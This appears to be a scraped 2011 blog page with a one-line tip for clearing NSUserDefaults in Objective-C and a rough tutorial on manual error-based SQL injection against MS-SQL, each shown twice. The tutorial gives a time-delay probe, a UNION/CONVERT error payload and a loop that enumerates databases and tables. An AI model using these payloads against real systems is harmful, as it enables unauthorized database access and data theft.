OSX IDS
Monday, April 11, 2011
Thursday, April 7, 2011
Clear NSUserDefaults
The following will clear all saved preferences:
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
Monday, April 4, 2011
MS-SQL Injection through errors
The following is a very very rough outline draft, I will fill in the details at a later date:
Sqlmap (also found on BackTrack OS) performs the following similar payload to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.
For example, we know the following form is vulnerable to a SQL injection utilizing the following payload:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following injection techniques to generate some useful information. The following was devised after many testings:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the unknown vulnerable query is pulling 8 columns. Therefore we need to match the amount of columns. The number of columns was found through SQL injection messages.
We then substitute our qryarg with the query we are interested in.
for i in range(1,500):
qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
This will loop through each request and enumerate the database.
Then we start enumerating table names based on the found database names:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
etc with columns, then actual rows.
Sqlmap (also found on BackTrack OS) performs the following similar payload to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.
For example, we know the following form is vulnerable to a SQL injection utilizing the following payload:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following injection techniques to generate some useful information. The following was devised after many testings:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the unknown vulnerable query is pulling 8 columns. Therefore we need to match the amount of columns. The number of columns was found through SQL injection messages.
We then substitute our qryarg with the query we are interested in.
for i in range(1,500):
qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
This will loop through each request and enumerate the database.
Then we start enumerating table names based on the found database names:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
etc with columns, then actual rows.
Subscribe to:
Posts (Atom)